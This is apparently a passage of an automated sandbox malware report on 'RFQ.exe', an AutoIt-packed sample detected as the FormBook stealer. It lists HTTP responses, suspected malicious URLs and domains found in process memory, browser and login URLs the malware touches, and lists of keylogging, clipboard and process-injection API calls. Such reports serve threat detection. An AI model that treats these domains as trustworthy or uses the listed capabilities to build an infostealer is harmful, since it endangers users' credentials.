                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 14:42:14 GMTServer: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 14:42:17 GMTServer: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 14:42:19 GMTServer: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 14:42:22 GMTServer: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>
                Source: enUILRNjDql.exe, 00000006.00000002.4574678267.0000000004F25000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.marketprediction.app
                Source: enUILRNjDql.exe, 00000006.00000002.4574678267.0000000004F25000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.marketprediction.app/ucmb/
                Source: net.exe, 00000004.00000002.4575456522.00000000066C0000.00000004.00000800.00020000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.00000000042BE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yushaliu.online/px.js?ch=1
                Source: net.exe, 00000004.00000002.4575456522.00000000066C0000.00000004.00000800.00020000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.00000000042BE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yushaliu.online/px.js?ch=2
                Source: net.exe, 00000004.00000002.4575456522.00000000066C0000.00000004.00000800.00020000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.00000000042BE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yushaliu.online/sk-logabpstatus.php?a=NlFjSUtLSnllS1JFblBWQWdKcys3ZzRjSzh6dkNqL1JnUEMzQWh
                Source: net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: enUILRNjDql.exe, 00000006.00000002.4573150295.00000000042BE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: net.exe, 00000004.00000002.4572237813.00000000030DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: net.exe, 00000004.00000002.4572237813.00000000030DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: net.exe, 00000004.00000002.4572237813.00000000030DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: net.exe, 00000004.00000002.4572237813.00000000030DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: net.exe, 00000004.00000002.4572237813.00000000030DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: net.exe, 00000004.00000002.4572237813.00000000030DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: net.exe, 00000004.00000003.2476536120.0000000008161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: net.exe, 00000004.00000002.4573862454.0000000004286000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.0000000002FE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=4nk.education
                Source: net.exe, 00000004.00000002.4573862454.0000000004BF2000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=astorg-group.info
                Source: net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: net.exe, 00000004.00000002.4573862454.0000000004286000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4573862454.0000000004BF2000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.0000000002FE6000.00000004.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
                Source: net.exe, 00000004.00000002.4573862454.0000000004418000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4573862454.00000000045AA000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.000000000330A000.00000004.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.0000000003178000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00786B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00786B0C
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00786D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00786D07
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00786B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00786B0C
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00772B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00772B37
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0079F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0079F7FF

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.4572018212.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2291393354.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4574678267.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2291056975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4573259207.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4573144434.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4572938071.00000000047E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2291967315.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\RFQ.exeCode function: This is a third-party compiled AutoIt script.0_2_00733D19
                Source: RFQ.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: RFQ.exe, 00000000.00000000.2107955692.00000000007DE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_bd9683c7-1
                Source: RFQ.exe, 00000000.00000000.2107955692.00000000007DE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: vSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_fd9ffdcc-7
                Source: RFQ.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d5de4a03-7
                Source: RFQ.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_b26a78ad-f
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: RFQ.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042CA43 NtClose,2_2_0042CA43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B60 NtClose,LdrInitializeThunk,2_2_03972B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03972DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039735C0 NtCreateMutant,LdrInitializeThunk,2_2_039735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974340 NtSetContextThread,2_2_03974340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974650 NtSuspendThread,2_2_03974650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B80 NtQueryInformationFile,2_2_03972B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BA0 NtEnumerateValueKey,2_2_03972BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BF0 NtAllocateVirtualMemory,2_2_03972BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BE0 NtQueryValueKey,2_2_03972BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AB0 NtWaitForSingleObject,2_2_03972AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AD0 NtReadFile,2_2_03972AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AF0 NtWriteFile,2_2_03972AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F90 NtProtectVirtualMemory,2_2_03972F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FB0 NtResumeThread,2_2_03972FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FA0 NtQuerySection,2_2_03972FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FE0 NtCreateFile,2_2_03972FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F30 NtCreateSection,2_2_03972F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F60 NtCreateProcessEx,2_2_03972F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E80 NtReadVirtualMemory,2_2_03972E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EA0 NtAdjustPrivilegesToken,2_2_03972EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EE0 NtQueueApcThread,2_2_03972EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E30 NtWriteVirtualMemory,2_2_03972E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DB0 NtEnumerateKey,2_2_03972DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DD0 NtDelayExecution,2_2_03972DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D10 NtMapViewOfSection,2_2_03972D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D00 NtSetInformationFile,2_2_03972D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D30 NtUnmapViewOfSection,2_2_03972D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CA0 NtQueryInformationToken,2_2_03972CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CC0 NtQueryVirtualMemory,2_2_03972CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CF0 NtOpenProcess,2_2_03972CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C00 NtQueryInformationProcess,2_2_03972C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C70 NtFreeVirtualMemory,2_2_03972C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C60 NtCreateKey,2_2_03972C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973090 NtSetValueKey,2_2_03973090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973010 NtOpenDirectoryObject,2_2_03973010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039739B0 NtGetContextThread,2_2_039739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D10 NtOpenProcessToken,2_2_03973D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D70 NtOpenThread,2_2_03973D70
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03754340 NtSetContextThread,LdrInitializeThunk,4_2_03754340
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03754650 NtSuspendThread,LdrInitializeThunk,4_2_03754650
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752B60 NtClose,LdrInitializeThunk,4_2_03752B60
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_03752BF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752BE0 NtQueryValueKey,LdrInitializeThunk,4_2_03752BE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_03752BA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752AF0 NtWriteFile,LdrInitializeThunk,4_2_03752AF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752AD0 NtReadFile,LdrInitializeThunk,4_2_03752AD0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752F30 NtCreateSection,LdrInitializeThunk,4_2_03752F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752FE0 NtCreateFile,LdrInitializeThunk,4_2_03752FE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752FB0 NtResumeThread,LdrInitializeThunk,4_2_03752FB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752EE0 NtQueueApcThread,LdrInitializeThunk,4_2_03752EE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_03752E80
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_03752D30
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752D10 NtMapViewOfSection,LdrInitializeThunk,4_2_03752D10
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03752DF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752DD0 NtDelayExecution,LdrInitializeThunk,4_2_03752DD0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03752C70
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752C60 NtCreateKey,LdrInitializeThunk,4_2_03752C60
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_03752CA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037535C0 NtCreateMutant,LdrInitializeThunk,4_2_037535C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037539B0 NtGetContextThread,LdrInitializeThunk,4_2_037539B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752B80 NtQueryInformationFile,4_2_03752B80
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752AB0 NtWaitForSingleObject,4_2_03752AB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752F60 NtCreateProcessEx,4_2_03752F60
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752FA0 NtQuerySection,4_2_03752FA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752F90 NtProtectVirtualMemory,4_2_03752F90
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752E30 NtWriteVirtualMemory,4_2_03752E30
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752EA0 NtAdjustPrivilegesToken,4_2_03752EA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752D00 NtSetInformationFile,4_2_03752D00
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752DB0 NtEnumerateKey,4_2_03752DB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752C00 NtQueryInformationProcess,4_2_03752C00
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752CF0 NtOpenProcess,4_2_03752CF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03752CC0 NtQueryVirtualMemory,4_2_03752CC0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03753010 NtOpenDirectoryObject,4_2_03753010
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03753090 NtSetValueKey,4_2_03753090
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03753D70 NtOpenThread,4_2_03753D70
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03753D10 NtOpenProcessToken,4_2_03753D10
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F09310 NtCreateFile,4_2_02F09310
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F09620 NtClose,4_2_02F09620
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F09780 NtAllocateVirtualMemory,4_2_02F09780
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F09480 NtReadFile,4_2_02F09480
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F09580 NtDeleteFile,4_2_02F09580
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00776606: CreateFileW,DeviceIoControl,CloseHandle,0_2_00776606
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0076ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_0076ACC5
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_007779D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_007779D3
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0075B0430_2_0075B043
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_007432000_2_00743200
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00743B700_2_00743B70
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0076410F0_2_0076410F
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_007502A40_2_007502A4
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0073E3E30_2_0073E3E3
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0076038E0_2_0076038E
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0076467F0_2_0076467F
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_007506D90_2_007506D9
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0079AACE0_2_0079AACE
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00764BEF0_2_00764BEF
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0075CCC10_2_0075CCC1
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0073AF500_2_0073AF50
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00736F070_2_00736F07
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0074B11F0_2_0074B11F
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_007931BC0_2_007931BC
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0075D1B90_2_0075D1B9
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0076724D0_2_0076724D
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0075123A0_2_0075123A
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_007393F00_2_007393F0
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_007713CA0_2_007713CA
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0074F5630_2_0074F563
